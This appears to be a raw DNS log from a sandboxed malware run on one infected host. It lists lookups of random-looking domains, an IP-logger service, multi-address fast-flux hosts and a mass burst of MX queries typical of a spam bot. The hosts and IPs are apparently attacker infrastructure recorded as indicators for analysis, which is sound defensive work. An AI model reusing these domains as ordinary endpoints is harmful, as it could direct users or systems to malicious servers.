Nov 30, 2023 11:23:33.228918076 CET	192.168.2.4	1.1.1.1	0x7a4f	Standard query (0)	pop.m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.240927935 CET	192.168.2.4	1.1.1.1	0x40e7	Standard query (0)	imap.m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.258677006 CET	192.168.2.4	1.1.1.1	0xe77e	Standard query (0)	relay.fyn.5idsevoeuliva0aafmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.274553061 CET	192.168.2.4	1.1.1.1	0xa33c	Standard query (0)	smtp.m4242ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:33.824167013 CET	192.168.2.4	1.1.1.1	0x52ef	Standard query (0)	buuni8.cail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:33.886388063 CET	192.168.2.4	1.1.1.1	0x5271	Standard query (0)	buuni8.cail.co.uk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2023 11:19:26.718415976 CET	1.1.1.1	192.168.2.4	0x97c3	Name error (3)	onualituyrs.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:28.861063957 CET	1.1.1.1	192.168.2.4	0x577e	No error (0)	sumagulituyo.org		34.94.245.237	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:28.861255884 CET	1.1.1.1	192.168.2.4	0x577e	No error (0)	sumagulituyo.org		34.94.245.237	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:28.874948978 CET	1.1.1.1	192.168.2.4	0x577e	No error (0)	sumagulituyo.org		34.94.245.237	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:29.876430988 CET	1.1.1.1	192.168.2.4	0x5033	No error (0)	snukerukeutit.org		104.198.2.251	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:31.138657093 CET	1.1.1.1	192.168.2.4	0xfa64	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:33.108839035 CET	1.1.1.1	192.168.2.4	0x830f	No error (0)	liuliuoumumy.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:34.374303102 CET	1.1.1.1	192.168.2.4	0x824a	No error (0)	stualialuyastrelia.net		91.215.85.17	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:48.419177055 CET	1.1.1.1	192.168.2.4	0x1d9c	No error (0)	2no.co		104.21.79.229	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:48.419177055 CET	1.1.1.1	192.168.2.4	0x1d9c	No error (0)	2no.co		172.67.149.76	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		175.126.109.15	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		190.218.32.77	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.119.84.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		180.94.156.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.168.53.110	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.119.84.112	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		109.175.29.39	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		115.88.24.200	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479593039 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		175.126.109.15	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		190.218.32.77	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.119.84.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		180.94.156.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.168.53.110	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.119.84.112	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		109.175.29.39	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		115.88.24.200	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479645967 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		175.126.109.15	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		190.218.32.77	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.119.84.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		180.94.156.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.168.53.110	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.119.84.112	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		109.175.29.39	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		115.88.24.200	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:54.479666948 CET	1.1.1.1	192.168.2.4	0xcdda	No error (0)	atozrental.cc		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		189.245.112.13	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		93.112.170.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562791109 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		189.232.44.70	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		189.245.112.13	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		93.112.170.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562892914 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		189.232.44.70	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		189.245.112.13	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		93.112.170.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:31.562930107 CET	1.1.1.1	192.168.2.4	0xf211	No error (0)	humydrole.com		189.232.44.70	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.372698069 CET	1.1.1.1	192.168.2.4	0x7b4e	Name error (3)	osrniamadvea.lrhzda.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.375186920 CET	1.1.1.1	192.168.2.4	0xb929	Name error (3)	23xd5a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.375674009 CET	1.1.1.1	192.168.2.4	0x7d3	Name error (3)	phcg87k6barre352odseba.dcivenail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.375972986 CET	1.1.1.1	192.168.2.4	0xc28b	Name error (3)	yahcl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.376869917 CET	1.1.1.1	192.168.2.4	0x6745	Name error (3)	zma51baya.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.376883030 CET	1.1.1.1	192.168.2.4	0xcd89	Name error (3)	gmaigcmar19l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.377477884 CET	1.1.1.1	192.168.2.4	0xe44c	Name error (3)	comcaci.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.402812004 CET	1.1.1.1	192.168.2.4	0xa73e	Name error (3)	yahpn.yb	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.404640913 CET	1.1.1.1	192.168.2.4	0xd50a	Name error (3)	comcaio.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.404653072 CET	1.1.1.1	192.168.2.4	0xd0b8	Name error (3)	gtblil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.405926943 CET	1.1.1.1	192.168.2.4	0x137b	Name error (3)	s.ddo	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.407202005 CET	1.1.1.1	192.168.2.4	0x7116	Name error (3)	jubo.cath	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.410207033 CET	1.1.1.1	192.168.2.4	0x36be	Name error (3)	ee.idbo	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.411389112 CET	1.1.1.1	192.168.2.4	0x7cbb	Name error (3)	yahgt.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.421885967 CET	1.1.1.1	192.168.2.4	0x4ec7	Name error (3)	yahjl.cxs	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.423796892 CET	1.1.1.1	192.168.2.4	0x16e	Name error (3)	daytonpubhocso.cog	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.423908949 CET	1.1.1.1	192.168.2.4	0xf832	Name error (3)	wr.omt222lil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.426434994 CET	1.1.1.1	192.168.2.4	0x1976	Name error (3)	hot13l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.426506996 CET	1.1.1.1	192.168.2.4	0xd8b9	Name error (3)	as.hauet	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.432101965 CET	1.1.1.1	192.168.2.4	0xc1b2	Name error (3)	caatholiomissa.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.432964087 CET	1.1.1.1	192.168.2.4	0x56c6	Name error (3)	lyco2.comom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.433094978 CET	1.1.1.1	192.168.2.4	0x69a3	Name error (3)	slyvor.as290a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.434076071 CET	1.1.1.1	192.168.2.4	0x732f	Name error (3)	as.r.upze	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.434298038 CET	1.1.1.1	192.168.2.4	0x4415	Name error (3)	yahgr.neaco	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.435170889 CET	1.1.1.1	192.168.2.4	0xf980	No error (0)	m7l.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.435170889 CET	1.1.1.1	192.168.2.4	0xf980	No error (0)	m7l.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.435765028 CET	1.1.1.1	192.168.2.4	0x9ba9	Name error (3)	rhacmtu.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.436465979 CET	1.1.1.1	192.168.2.4	0x423	Name error (3)	horadguc1995l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.436553001 CET	1.1.1.1	192.168.2.4	0x102f	Name error (3)	t-yil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.454607964 CET	1.1.1.1	192.168.2.4	0x67fe	Name error (3)	tbsayail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.457063913 CET	1.1.1.1	192.168.2.4	0x18ee	No error (0)	onlist.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.478238106 CET	1.1.1.1	192.168.2.4	0x339b	No error (0)	nrnet.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.478238106 CET	1.1.1.1	192.168.2.4	0x339b	No error (0)	nrnet.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.479913950 CET	1.1.1.1	192.168.2.4	0x8306	Name error (3)	he0114zusmg454lil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.480489016 CET	1.1.1.1	192.168.2.4	0x4875	Name error (3)	buromaril.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.483196974 CET	1.1.1.1	192.168.2.4	0xbfdc	Name error (3)	fldie12.jdgwcollfaaba.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.483409882 CET	1.1.1.1	192.168.2.4	0x8135	Name error (3)	f.nyhm	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.483660936 CET	1.1.1.1	192.168.2.4	0x5b26	Name error (3)	yahe.nen	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.484647989 CET	1.1.1.1	192.168.2.4	0xeb60	Name error (3)	ho10a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.487098932 CET	1.1.1.1	192.168.2.4	0xcbf3	Name error (3)	wn26lil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.487849951 CET	1.1.1.1	192.168.2.4	0xa86a	Name error (3)	e-fja8mso.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.488188982 CET	1.1.1.1	192.168.2.4	0x663f	Name error (3)	yahao.lsa	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.491626024 CET	1.1.1.1	192.168.2.4	0xfd18	Name error (3)	hgaarnlundejl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.492428064 CET	1.1.1.1	192.168.2.4	0x2a36	Name error (3)	7.dceilil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.493848085 CET	1.1.1.1	192.168.2.4	0xfc41	Name error (3)	gez542l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.495815039 CET	1.1.1.1	192.168.2.4	0xbeed	Name error (3)	hotmea1aia.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.495964050 CET	1.1.1.1	192.168.2.4	0x22f1	Name error (3)	cucumbnr.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.496778965 CET	1.1.1.1	192.168.2.4	0xc79d	Name error (3)	qebyte.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.499121904 CET	1.1.1.1	192.168.2.4	0x686f	Name error (3)	deptka7ffmail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.499756098 CET	1.1.1.1	192.168.2.4	0x3219	Name error (3)	loaquorezcil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.500066996 CET	1.1.1.1	192.168.2.4	0x2cf9	Name error (3)	yahfll.ianus	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.504868031 CET	1.1.1.1	192.168.2.4	0xf2f3	Name error (3)	pyctl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.506038904 CET	1.1.1.1	192.168.2.4	0x9d0c	Name error (3)	gmdcblil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.507493973 CET	1.1.1.1	192.168.2.4	0xb659	Name error (3)	nnblmogblmoglil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.545084000 CET	1.1.1.1	192.168.2.4	0xed53	Name error (3)	ez786-lcolwicn.coofmail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.547832012 CET	1.1.1.1	192.168.2.4	0xe896	Name error (3)	feoio.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.548218966 CET	1.1.1.1	192.168.2.4	0x78e9	Name error (3)	ayls.xcom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.549220085 CET	1.1.1.1	192.168.2.4	0x67a1	Name error (3)	h333ol03t8rwslive21lok.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.551140070 CET	1.1.1.1	192.168.2.4	0x329f	Name error (3)	aomttdl.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.558983088 CET	1.1.1.1	192.168.2.4	0x90cf	Name error (3)	domo5ho.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.563549995 CET	1.1.1.1	192.168.2.4	0xbc58	Name error (3)	qhlil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.566319942 CET	1.1.1.1	192.168.2.4	0xfada	Name error (3)	hl.comuk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.566637993 CET	1.1.1.1	192.168.2.4	0xce60	Server failure (2)	rknsieiwn.ail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.568959951 CET	1.1.1.1	192.168.2.4	0x3fe	Name error (3)	tload.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.570040941 CET	1.1.1.1	192.168.2.4	0x924f	Name error (3)	asgmaanxgdil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.570225000 CET	1.1.1.1	192.168.2.4	0x350	Name error (3)	kni.ol168.ecom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.570697069 CET	1.1.1.1	192.168.2.4	0x5b4e	Name error (3)	sbcgloboo.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.571306944 CET	1.1.1.1	192.168.2.4	0x1e09	Name error (3)	gmaiuilil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.571403980 CET	1.1.1.1	192.168.2.4	0xff54	Name error (3)	qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.571990013 CET	1.1.1.1	192.168.2.4	0xa87f	Name error (3)	asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.572437048 CET	1.1.1.1	192.168.2.4	0x229b	Name error (3)	wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.572489977 CET	1.1.1.1	192.168.2.4	0x9378	Name error (3)	comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.572642088 CET	1.1.1.1	192.168.2.4	0xc6cd	Name error (3)	sbcglob4m.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.572938919 CET	1.1.1.1	192.168.2.4	0x7aed	Name error (3)	sgt9o.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.573225021 CET	1.1.1.1	192.168.2.4	0x58ab	Name error (3)	23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.573360920 CET	1.1.1.1	192.168.2.4	0xb2d9	Name error (3)	yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.573776960 CET	1.1.1.1	192.168.2.4	0x61d5	Name error (3)	hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.573802948 CET	1.1.1.1	192.168.2.4	0x85bd	Name error (3)	domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.574146986 CET	1.1.1.1	192.168.2.4	0x26f5	Name error (3)	osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.574173927 CET	1.1.1.1	192.168.2.4	0x848d	Name error (3)	getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.574687004 CET	1.1.1.1	192.168.2.4	0xe96e	Name error (3)	zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.574796915 CET	1.1.1.1	192.168.2.4	0xffc4	Name error (3)	gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.575226068 CET	1.1.1.1	192.168.2.4	0x6e8e	Name error (3)	tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.575361013 CET	1.1.1.1	192.168.2.4	0x45c6	Name error (3)	yahwoooie2ampu.comsh	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.593954086 CET	1.1.1.1	192.168.2.4	0x7e27	No error (0)	san.ee			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.593954086 CET	1.1.1.1	192.168.2.4	0x7e27	No error (0)	san.ee			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.593954086 CET	1.1.1.1	192.168.2.4	0x7e27	No error (0)	san.ee			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.593954086 CET	1.1.1.1	192.168.2.4	0x7e27	No error (0)	san.ee			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.593954086 CET	1.1.1.1	192.168.2.4	0x7e27	No error (0)	san.ee			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.601017952 CET	1.1.1.1	192.168.2.4	0x7f37	Name error (3)	ezi.adompany.at	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.610877991 CET	1.1.1.1	192.168.2.4	0xaeb0	Name error (3)	m0bhfhblezlsl1.co.tv	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.620619059 CET	1.1.1.1	192.168.2.4	0xaa33	Name error (3)	oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.627432108 CET	1.1.1.1	192.168.2.4	0x98f2	Name error (3)	hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.632817984 CET	1.1.1.1	192.168.2.4	0x7436	Name error (3)	asail.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.634418011 CET	1.1.1.1	192.168.2.4	0xb0fe	Name error (3)	geu015naryo-uail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.646157980 CET	1.1.1.1	192.168.2.4	0x66f0	Name error (3)	syn.lil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.649360895 CET	1.1.1.1	192.168.2.4	0xa9d9	Name error (3)	klp.tn	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.649533987 CET	1.1.1.1	192.168.2.4	0xe4d0	Name error (3)	t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.652885914 CET	1.1.1.1	192.168.2.4	0xbb3	No error (0)	gr.2mail.com			MX (Mail exchange)	IN (0x0001)	false
